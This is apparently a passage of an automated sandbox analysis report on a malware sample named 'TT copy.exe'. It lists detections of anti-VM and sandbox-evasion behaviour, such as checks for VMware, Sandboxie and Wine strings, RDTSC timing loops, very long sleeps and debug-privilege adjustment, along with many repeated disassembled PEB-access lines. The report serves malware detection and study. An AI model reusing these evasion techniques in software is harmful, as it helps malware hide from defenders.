            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TT copy.exe PID: 1800, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: TT copy.exe, 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: TT copy.exe, 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\TT copy.exeRDTSC instruction interceptor: First address: 0000000000408C14 second address: 0000000000408C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\TT copy.exeRDTSC instruction interceptor: First address: 0000000000408FAE second address: 0000000000408FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000F38C14 second address: 0000000000F38C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000F38FAE second address: 0000000000F38FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\TT copy.exe TID: 5700Thread sleep time: -43731s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exe TID: 3808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00408EE0 rdtsc 3_2_00408EE0
            Source: C:\Users\user\Desktop\TT copy.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeAPI coverage: 6.5 %
            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.4 %
            Source: C:\Users\user\Desktop\TT copy.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F41670 FindFirstFileW,FindNextFileW,FindClose,15_2_00F41670
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4166B FindFirstFileW,FindNextFileW,FindClose,15_2_00F4166B
            Source: C:\Users\user\Desktop\TT copy.exeThread delayed: delay time: 43731Jump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000007.00000000.332892277.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.408200731.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.334319588.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.409396951.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.295820558.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rundll32.exe, 0000000F.00000002.775195320.00000000034E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775216398.0000000003503000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000000.408200731.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000007.00000000.295820558.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000007.00000000.334319588.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.334319588.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00408EE0 rdtsc 3_2_00408EE0
            Source: C:\Users\user\Desktop\TT copy.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069100 mov eax, dword ptr fs:[00000030h]3_2_01069100
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069100 mov eax, dword ptr fs:[00000030h]3_2_01069100
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069100 mov eax, dword ptr fs:[00000030h]3_2_01069100
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01084120 mov eax, dword ptr fs:[00000030h]3_2_01084120
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01084120 mov eax, dword ptr fs:[00000030h]3_2_01084120
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01084120 mov eax, dword ptr fs:[00000030h]3_2_01084120
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01084120 mov eax, dword ptr fs:[00000030h]3_2_01084120
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01084120 mov ecx, dword ptr fs:[00000030h]3_2_01084120
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109513A mov eax, dword ptr fs:[00000030h]3_2_0109513A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109513A mov eax, dword ptr fs:[00000030h]3_2_0109513A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B944 mov eax, dword ptr fs:[00000030h]3_2_0108B944
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B944 mov eax, dword ptr fs:[00000030h]3_2_0108B944
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C962 mov eax, dword ptr fs:[00000030h]3_2_0106C962
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106B171 mov eax, dword ptr fs:[00000030h]3_2_0106B171
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106B171 mov eax, dword ptr fs:[00000030h]3_2_0106B171
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108C182 mov eax, dword ptr fs:[00000030h]3_2_0108C182
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A185 mov eax, dword ptr fs:[00000030h]3_2_0109A185
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092990 mov eax, dword ptr fs:[00000030h]3_2_01092990
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E69A6 mov eax, dword ptr fs:[00000030h]3_2_010E69A6
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010961A0 mov eax, dword ptr fs:[00000030h]3_2_010961A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010961A0 mov eax, dword ptr fs:[00000030h]3_2_010961A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E51BE mov eax, dword ptr fs:[00000030h]3_2_010E51BE
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E51BE mov eax, dword ptr fs:[00000030h]3_2_010E51BE
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E51BE mov eax, dword ptr fs:[00000030h]3_2_010E51BE
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E51BE mov eax, dword ptr fs:[00000030h]3_2_010E51BE
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011249A4 mov eax, dword ptr fs:[00000030h]3_2_011249A4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011249A4 mov eax, dword ptr fs:[00000030h]3_2_011249A4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011249A4 mov eax, dword ptr fs:[00000030h]3_2_011249A4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011249A4 mov eax, dword ptr fs:[00000030h]3_2_011249A4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov eax, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov eax, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov eax, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov ecx, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF mov eax, dword ptr fs:[00000030h]3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106B1E1 mov eax, dword ptr fs:[00000030h]3_2_0106B1E1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106B1E1 mov eax, dword ptr fs:[00000030h]3_2_0106B1E1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106B1E1 mov eax, dword ptr fs:[00000030h]3_2_0106B1E1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010F41E8 mov eax, dword ptr fs:[00000030h]3_2_010F41E8
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01134015 mov eax, dword ptr fs:[00000030h]3_2_01134015
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01134015 mov eax, dword ptr fs:[00000030h]3_2_01134015
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7016 mov eax, dword ptr fs:[00000030h]3_2_010E7016
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7016 mov eax, dword ptr fs:[00000030h]3_2_010E7016
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7016 mov eax, dword ptr fs:[00000030h]3_2_010E7016
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109002D mov eax, dword ptr fs:[00000030h]3_2_0109002D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109002D mov eax, dword ptr fs:[00000030h]3_2_0109002D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109002D mov eax, dword ptr fs:[00000030h]3_2_0109002D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109002D mov eax, dword ptr fs:[00000030h]3_2_0109002D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109002D mov eax, dword ptr fs:[00000030h]3_2_0109002D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107B02A mov eax, dword ptr fs:[00000030h]3_2_0107B02A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107B02A mov eax, dword ptr fs:[00000030h]3_2_0107B02A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107B02A mov eax, dword ptr fs:[00000030h]3_2_0107B02A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107B02A mov eax, dword ptr fs:[00000030h]3_2_0107B02A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A830 mov eax, dword ptr fs:[00000030h]3_2_0108A830
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A830 mov eax, dword ptr fs:[00000030h]3_2_0108A830
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A830 mov eax, dword ptr fs:[00000030h]3_2_0108A830
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A830 mov eax, dword ptr fs:[00000030h]3_2_0108A830
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01080050 mov eax, dword ptr fs:[00000030h]3_2_01080050
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01080050 mov eax, dword ptr fs:[00000030h]3_2_01080050
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122073 mov eax, dword ptr fs:[00000030h]3_2_01122073
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01131074 mov eax, dword ptr fs:[00000030h]3_2_01131074
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069080 mov eax, dword ptr fs:[00000030h]3_2_01069080
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E3884 mov eax, dword ptr fs:[00000030h]3_2_010E3884
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E3884 mov eax, dword ptr fs:[00000030h]3_2_010E3884
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A90AF mov eax, dword ptr fs:[00000030h]3_2_010A90AF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A0 mov eax, dword ptr fs:[00000030h]3_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A0 mov eax, dword ptr fs:[00000030h]3_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A0 mov eax, dword ptr fs:[00000030h]3_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A0 mov eax, dword ptr fs:[00000030h]3_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A0 mov eax, dword ptr fs:[00000030h]3_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A0 mov eax, dword ptr fs:[00000030h]3_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109F0BF mov ecx, dword ptr fs:[00000030h]3_2_0109F0BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109F0BF mov eax, dword ptr fs:[00000030h]3_2_0109F0BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109F0BF mov eax, dword ptr fs:[00000030h]3_2_0109F0BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FB8D0 mov eax, dword ptr fs:[00000030h]3_2_010FB8D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FB8D0 mov ecx, dword ptr fs:[00000030h]3_2_010FB8D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FB8D0 mov eax, dword ptr fs:[00000030h]3_2_010FB8D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FB8D0 mov eax, dword ptr fs:[00000030h]3_2_010FB8D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FB8D0 mov eax, dword ptr fs:[00000030h]3_2_010FB8D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FB8D0 mov eax, dword ptr fs:[00000030h]3_2_010FB8D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010640E1 mov eax, dword ptr fs:[00000030h]3_2_010640E1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010640E1 mov eax, dword ptr fs:[00000030h]3_2_010640E1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010640E1 mov eax, dword ptr fs:[00000030h]3_2_010640E1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010658EC mov eax, dword ptr fs:[00000030h]3_2_010658EC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B8E4 mov eax, dword ptr fs:[00000030h]3_2_0108B8E4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B8E4 mov eax, dword ptr fs:[00000030h]3_2_0108B8E4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A309 mov eax, dword ptr fs:[00000030h]3_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112131B mov eax, dword ptr fs:[00000030h]3_2_0112131B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106DB40 mov eax, dword ptr fs:[00000030h]3_2_0106DB40
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138B58 mov eax, dword ptr fs:[00000030h]3_2_01138B58
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106F358 mov eax, dword ptr fs:[00000030h]3_2_0106F358
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106DB60 mov ecx, dword ptr fs:[00000030h]3_2_0106DB60
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01093B7A mov eax, dword ptr fs:[00000030h]3_2_01093B7A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01093B7A mov eax, dword ptr fs:[00000030h]3_2_01093B7A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01071B8F mov eax, dword ptr fs:[00000030h]3_2_01071B8F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01071B8F mov eax, dword ptr fs:[00000030h]3_2_01071B8F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111D380 mov ecx, dword ptr fs:[00000030h]3_2_0111D380
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112138A mov eax, dword ptr fs:[00000030h]3_2_0112138A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109B390 mov eax, dword ptr fs:[00000030h]3_2_0109B390
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092397 mov eax, dword ptr fs:[00000030h]3_2_01092397
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01094BAD mov eax, dword ptr fs:[00000030h]3_2_01094BAD
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01094BAD mov eax, dword ptr fs:[00000030h]3_2_01094BAD
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01094BAD mov eax, dword ptr fs:[00000030h]3_2_01094BAD
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01135BA5 mov eax, dword ptr fs:[00000030h]3_2_01135BA5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E53CA mov eax, dword ptr fs:[00000030h]3_2_010E53CA
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E53CA mov eax, dword ptr fs:[00000030h]3_2_010E53CA
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108DBE9 mov eax, dword ptr fs:[00000030h]3_2_0108DBE9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010903E2 mov eax, dword ptr fs:[00000030h]3_2_010903E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010903E2 mov eax, dword ptr fs:[00000030h]3_2_010903E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010903E2 mov eax, dword ptr fs:[00000030h]3_2_010903E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010903E2 mov eax, dword ptr fs:[00000030h]3_2_010903E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010903E2 mov eax, dword ptr fs:[00000030h]3_2_010903E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010903E2 mov eax, dword ptr fs:[00000030h]3_2_010903E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011123E3 mov ecx, dword ptr fs:[00000030h]3_2_011123E3
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011123E3 mov ecx, dword ptr fs:[00000030h]3_2_011123E3
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011123E3 mov eax, dword ptr fs:[00000030h]3_2_011123E3
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112AA16 mov eax, dword ptr fs:[00000030h]3_2_0112AA16
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112AA16 mov eax, dword ptr fs:[00000030h]3_2_0112AA16
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01078A0A mov eax, dword ptr fs:[00000030h]3_2_01078A0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h]3_2_0106AA16
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h]3_2_0106AA16
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01083A1C mov eax, dword ptr fs:[00000030h]3_2_01083A1C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01065210 mov eax, dword ptr fs:[00000030h]3_2_01065210
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01065210 mov ecx, dword ptr fs:[00000030h]3_2_01065210
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01065210 mov eax, dword ptr fs:[00000030h]3_2_01065210
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01065210 mov eax, dword ptr fs:[00000030h]3_2_01065210
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
